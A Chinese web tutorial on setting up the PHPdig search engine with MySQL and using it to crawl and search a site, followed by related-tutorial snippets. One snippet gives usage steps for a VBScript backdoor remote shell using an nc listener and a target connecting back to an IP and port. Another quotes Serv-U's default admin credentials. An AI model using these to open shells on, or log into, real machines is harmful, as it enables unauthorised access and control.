用PHPdig打造属于你自己的Google[图文教程]

一、什么是PHPdig?

   PHPdig是国外非常流行的垂直搜索引擎产品(与其说是产品,不如说是一项区别于传统搜索引擎的搜索技术),采用PHP语言编写,利用了PHP程序运行的高效性,极大地提高了搜索反应速度,它可以像Google或者Baidu以及其它搜索引擎一样搜索互联网,搜索内容除了普通的网页外还包括txt, doc, xls, pdf等各式的文件,具有强大的内容搜索和文件解析功能。PHPdig同传统的搜索引擎一样,包含了以下三种最基本的技术:

   1.Spider技术

   2.网页结构化信息抽取技术或元数据采集技术

   3.分词、索引技术

   区别于传统搜索引擎,PHPdig适用于专业化更强、层次更深的个性化搜索引擎,利用它打造针对某一领域的垂直搜索引擎是最好的选择。

   二、如何获得这PHPdig?

   PHPdig是免费产品(需要保留版权),最新版本是 phpdig-1.8.9 为了避免Apache以及MYSQL的版本兼容性问题,建议采用较低级的版本,其网站地址是:http://www.phpdig.net ,下载地址是:http://www.phpdig.net/navigation.php?action=download 说明一下,我试用过phpdig-1.8.9版本,但出现了很多问题,改用PHPdig-1.8.8则问题较少。

   三、具体步骤

   1.获取产品

   访问http://www.phpdig.net/navigation.php?action=download下载PHPdig-1.8.8至桌面,解压缩至Apache服务器html目录,一般路径为:D:\usr\www\html\,(如果你没有安装Apache服务器请事先安装,推荐使用Mappm-Server v1.1.9 Final,Mappm-Server 采用傻瓜式安装,一次搞定,方便调试和运行 PHP/CGI MySQL 程序)。

   2.运行并配置PHPdig数据库

   打开浏览器输入http://localhost/phpdig/按回车键,页面列出PHPdig的所有文件及包含文件夹,找一找发现没有默认首页文件(default,index),单击search.php文件出现错误提示:Unable to connect to database : Check the connection script。提示无法完成数据库连接,原来我们还没有完成PHPdig的数据库配置。返回进入admin目录找到install.php文件,单击运行,乍一看,全英文界面(说明一下,PHPdig目前所有版本均不支持中文界面),没有关系,如果你有过汉化经验不妨自己动手将其汉化,这里提供一份我自己汉化的cn-language.php文档的下载(请将其拷贝至locales目录下)。另外你还需修改includes目录下的config.php文件(语言修改)和style.css文件(字体修改和样式修改)。

   进入install.php后系统要求我们输入PHPdig管理用户名和密码,默认情况下均为admin,进入后出现如下界面(汉化后):


(图1)

   所需提供的信息有:

   如果你是在本地测试,请输入默认情况下的服务器名称localhost(localhost是Mappm-Server下的默认务服务器名称,也就是mysql的默认服务器名称,Mappm-Server内置mysql数据库)数据库服务器端口默认为3126,可以不填,数据库sock协议默认为空,用户名默认为root(Mappm-Server默认用户名),密码是你在安装Mappm-Server时输入的用户密码,PHPdig数据库名称默认为phpdig,可任意修改,同时,你可以对数据库中的数据表加前缀,默认为空。

   如果你要上传到与Internet相连的web服务器请向服务器提供商索要mysql服务器的名称或者IP地址以及数据库服务器端口、sock协议、用户名、密码等,数据库名称以及数据表前缀的设置同上。

   至于右边的四个单选按钮,你可以视情况而定,初次使用(安装)选择默认的“建立数据库”

   确认上述信息无误后单击安装按钮,如果连接数据库不成功会提示“不能连接数据库”的错误信息,如果数据库连接成功则会直接跳入管理页面如下图:


(图2)

   3. 界面区域介绍

   区域1是一个文本输入区,默认文字有三行,都是以http开头,大家一看就知道在这里输入要spider的站点的网站地址(建议每次只spider一个网站)。

   区域2是spider选项,搜索深度是指对这个网站spider到几级目录,每页链接数是指针对某个网页最多抓取多少个下面的链接网页。默认情况下都为0,指的是对这个站点进行全站spider。

   区域3显示数据库状态信息,包括已经spider的网站、关键词、索引以及正在spider的站点信息等。

   区域4是一个下拉列表框,罗列出已经spider的站点的网址,选中其中的一个站点,在区域5可以对其进行清除和更新操作。

   区域5不仅提供了对区域4中所选站点的清除和更新操作外,还提供了相关的统计信息入口和对spider的控制等。

   4. 针对特定站点运行spider

   如果你对天极软件频道的内容很感兴趣,你就可以做一个比google更专业的搜索引擎来搜索天极软件的内容,你的这个搜索引擎将比google更全面更深层次。下面我们以spider天极软件频道的内容为例介绍一下如何spider一个网站。

   1)在图2的区域1中输入http://soft.yesky.com,搜索深度和每页链接数都保持默认为0

   2)单击spider按钮,页面跳转到spider信息页面,程序开始自动spider站点http://soft.yesky.com的内容。

   注意:spider网站的过程非常缓慢,如果该网站内容太多,这个过程可能会延续几小时到一天,但你不必担心脚本运行超时,因为系统的timeout时间被设置为最长达48小时。在这个过程中,你也可以中断spider程序的运行,并能重新启动spider程序运行未spider完的网站。需要注意的是若在这个过程中你不小心关闭了spider运行页面,但事实上系统并没有停止spider,仍在消耗系统资源。你可以重新打开spider页面,点击停止spider链接方可释放系统资源。


(图3)

   5. 利用PHPdig进行搜索

   经过一段时间后,spider程序运行的结果是将http://soft.yesky.com网站上的信息抓取到服务器数据库中,主要是对方内容的title信息、关键词信息和页面地址信息等,此时,你就可以通过访问search.php进行搜索了。


(图4)

   你可以选择搜索结果显示的条数,可以选择模糊查找还是精确查找,另外你可以选择针对某个站点的搜索,默认情况下搜索已经被spider的所有站点。


(图5)

   上图是搜索“QQ2006”的搜索结果页面。

   6. 存在的问题

   由于PHPdig的语言设置问题、系统的分词问题以及MYSQL数据库的字符处理问题等,PHPdig对汉语词汇的搜索还存在许多不确定因素,这些东西都有待我们进一步去解决和完善,欢迎广大对此感兴趣的朋友们到网页陶吧-PHPdig主题社区进行探讨。

(0)

相关推荐

  • 用PHPdig打造属于你自己的Google[图文教程]

    一.什么是PHPdig? PHPdig是国外非常流行的垂直搜索引擎产品(与其说是产品,不如说是一项区别于传统搜索引擎的搜索技术),采用PHP语言编写,利用了PHP程序运行的高效性,极大地提高了搜索反应速度,它可以像Google或者Baidu以及其它搜索引擎一样搜索互联网,搜索内容除了普通的网页外还包括txt, doc, xls, pdf等各式的文件,具有强大的内容搜索和文件解析功能.PHPdig同传统的搜索引擎一样,包含了以下三种最基本的技术: 1.Spider技术 2.网页结构化信息抽取技术或

  • 打造个性_安全的电脑系统图文教程

    个人喜欢安装原版的XP系统,即未被做明显修改的系统.原因很简单,我喜欢自已动手打造我的个性系统. 在从光盘启动到DOS状态下后,先将C盘格式化(如果你用的GHOST版本的系统的话,它就不会提示了,因为可以直接覆盖C盘),有两种格式方法,NTFS和FAT32,建议把文件系统设为NTFS.这样可以更容易更完全的控制你的电脑,并且,更安全. 装完系统进入桌面后,如果你是品牌电脑,可能得寻找并安装合适驱动.以联想笔记本为例,你可以在重装电脑前进入联想官网,输入你的本本型号,找到合适驱动,全部下载,并保存

  • 制做Google Sitemap文件的简单方法与图文教程

    什么是Google Sitemap  Google新推出的Sitemap,是对原来robots.txt的扩展,它使用XML格式来记录整个网站的信息并供Google读取,使搜索引擎能更快更全面的收录网站的内容. Sitemap的作用就好像为网站提供了整站的RSS,而Google就是这些RSS的订阅者,只要网站有更新就会自动通知Google.这样一来,搜索引擎的收录由被动的Pull变成了主动的Push. 如何制作sitemap 一.确保自己有Google帐号 二.制作Sitemap 1.打开http

  • 打造个性_安全的电脑系统图文教程2第1/2页

    09 IE缓存文件转移:点击开始-设置-控制面板-INTERNET属性-常规-设置-移动文件夹.如图 10 移动我的文档:这个比较简单,直接在桌面上我的文档右键设置即可 11 设置虚拟内存: 右键"我的电脑"选择属性-高级-性能设置-高级-更改:先选择C盘,勾中"无分页文件"选项,然后选择其它分区,勾选"自定义大小".如果你是1G内存的话,设为512~1024就足够了:然后点击设置.如下图 接下来会提示重启.这次我们就重启吧.出现开机画面的时候按

  • VBScript 打造自己的远程CMDShell附使用教程

    请先下载 mswinsck.ocx 与 VB6Controls.reg! 使用方法: 1,控制:nc.exe,执行:nc -l -v -p 1234: 2,目标:cscript.exe enun.vbs IP Port: 3,密码:enun. 几点说明: 1,退出 SHELL,请输入 "exit",不要用 "Ctrl + C",这样的话只能等目标重启或手动运行后门才能连接: 2,Windows 7 等环境下普通标准用户也能使用,但是获取的权限相对有限. 3,内部命令

  • SERV-U打造最安全的FTP安全设置教程[图文]第1/5页

    首先是SERV-U的SITE CHMOD漏洞和Serv-U MDTM漏洞,即利用一个账号可以轻易的得到SYSTEM权限.其次是Serv-u的本地溢出漏洞,即Serv-U有一个默认的管理用户(用户名:localadministrator,密码:# @$ak#. k;0@p),任何人只要通过一个能访问本地端口43958的账号就可以随意增删账号和执行任意内部和外部命令. 此时,人们才开始重视起SERV-U的安全来,并采取了一些相关措施,如修改SERV-U的管理端口.账号和密码等.但是,修改后的内容还是

  • jQuery 打造动态渐变按钮 详细图文教程

    本教程分为以下三步: Step1 - Photoshop Step2 - HTML/CSS Step3 - JavaScript(jQuery) Step4 - CSS修改 最终结果如下: Step1 - Photoshop 1. 新建文件 按钮的尺寸是100px X 80px,但由于我们需要创建一个有两种状态的CSS sprite背景图,所以我们在Photoshop中创建(Ctrl+N)一个长宽为200px X 160px的图片文件,如下图: 2. 创建参考线 为了使绘制按钮更容易,我们创建参

  • IIS5.1安装配置图文教程 轻松打造ASP运行环境

    制作动态网页就需要进行环境配置,一般用微软的IIS,但是默认安装情况下IIS是没有被安装的,所以使用的时候需要进行安装配置,具体操作步骤如下图: 在控制面板里打开添加删除程序选项 这一步可能出现:xp系统无法打开添加与删除windows组件的情况,点击这里解决. 按上图中的提示操作,安装过程中需要一些文件,如果找不到IIS相关文件,点击这里下载IIS安装包

  • 用html css javascript打造自己的RIA图文教程第1/2页

    在制作之前,先建立开发环境.打开netbeans6.1,在项目工作区,右击新建项目,选择Web目录下的Web应用程序. 项目名称输入 RIADemo . 选择运行的服务器以及 java ee 标准. 在这里选择tomcat5.0,j2ee1.4,本文介绍例子,并不依赖于服务器,因为html&css&javascript本身都是静态的,做完以后就是一个html文件.严格意义上的web程序肯定是要有一个服务器来运行的,netbeans还是采用了这种管理理念.在这一步,已经可以点击完成建立项目,

  • 使用node打造自己的命令行工具方法教程

    一.实现一个简单的功能 二.环境 1.系统: window 10 2.编辑器: vscode 3.node版本: 8.7.0 三.开始玩 1.打开命令行,新建一个pa'ckage.json npm init 这时看到一个新的package.json生成了,使用编辑器打开 2.修改package.json,新增一个bin属性 { "name": "my-cli", "version": "1.0.0", "descri

随机推荐